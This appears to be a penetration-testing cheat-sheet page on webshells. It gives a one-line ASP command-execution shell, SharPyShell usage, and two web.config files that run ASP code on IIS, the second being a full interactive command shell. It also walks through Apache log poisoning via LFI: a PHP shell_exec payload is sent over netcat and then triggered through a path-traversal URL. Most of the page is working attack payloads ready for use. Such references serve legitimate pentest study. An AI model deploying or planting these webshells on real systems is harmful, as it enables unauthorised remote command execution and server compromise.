Webshell
One Line ASP Shell
<%response.write CreateObject("WScript.Shell").Exec(Request.QueryString("cmd")).StdOut.Readall()%>
Request with: http://target/shell.asp?cmd=ipconfig
SharPyShell: SharPyShell - tiny and obfuscated ASP.NET webshell for C# web applications.
python SharPyShell.py generate -p somepasswordpython SharPyShell.py interact -u http://target.url/sharpyshell.aspx -p somepassword
Sometimes IIS supports ASP files but it is not possible to upload any file with .ASP extension. In this case, it is possible to use a web.config file directly to run ASP classic codes:
<?xml version="1.0" encoding="UTF-8"?><configuration><system.webServer><handlers accessPolicy="Read, Script, Write"><add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" /></handlers><security><requestFiltering><fileExtensions><remove fileExtension=".config" /></fileExtensions><hiddenSegments><remove segment="web.config" /></hiddenSegments></requestFiltering></security></system.webServer></configuration><!-- ASP code comes here! It should not include HTML comment closing tag and double dashes!<%Response.write("-"&"->")' it is running the ASP code if you can see 3 by opening the web.config file!Response.write(1+2)Response.write("<!-"&"-")%>-->
<?xml version="1.0" encoding="UTF-8"?><configuration><system.webServer><handlers accessPolicy="Read, Script, Write"><add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" /></handlers><security><requestFiltering><fileExtensions><remove fileExtension=".config" /></fileExtensions><hiddenSegments><remove segment="web.config" /></hiddenSegments></requestFiltering></security></system.webServer></configuration><%Set oScript = Server.CreateObject("WSCRIPT.SHELL")Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")Function getCommandOutput(theCommand)Dim objShell, objCmdExecSet objShell = CreateObject("WScript.Shell")Set objCmdExec = objshell.exec(thecommand)getCommandOutput = objCmdExec.StdOut.ReadAllend Function%><FORM action="" method="GET"><input type="text" name="cmd" size=45 value="<%= szCMD %>"><input type="submit" value="Run"></FORM><PRE><%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %><%Response.Write(Request.ServerVariables("server_name"))%><p><b>The server's port:</b><%Response.Write(Request.ServerVariables("server_port"))%></p><p><b>The server's software:</b><%Response.Write(Request.ServerVariables("server_software"))%></p><p><b>The server's software:</b><%Response.Write(Request.ServerVariables("LOCAL_ADDR"))%><% szCMD = request("cmd")thisDir = getCommandOutput("cmd /c" & szCMD)Response.Write(thisDir)%></p><br>
References: https://soroush.secproject.com/blog/2014/07/upload-a-web-config-file-for-fun-profit/
Required: Initial LFI found 😼
Here you will get intercepted data where we need to inject our cmd comment inside user-agent by replacing highlighted data.
We can also try to add via netcat:
nc -nv 10.11.1.35 80(UNKNOWN) [10.11.1.35] 80 (http) open<?php echo shell_exec($_GET['cmd']);?>HTTP/1.1 400 Bad Request
Next, get RCE by adding the cmd parameter:
http://10.11.15.137/addguestbook.php?name=aaa&comment=aaa&cmd=dir%20&LANG=../../../../../../../xampp/apache/logs/access.log%00
Reference: https://www.hackingarticles.in/apache-log-poisoning-through-lfi/
Last updated 4 months ago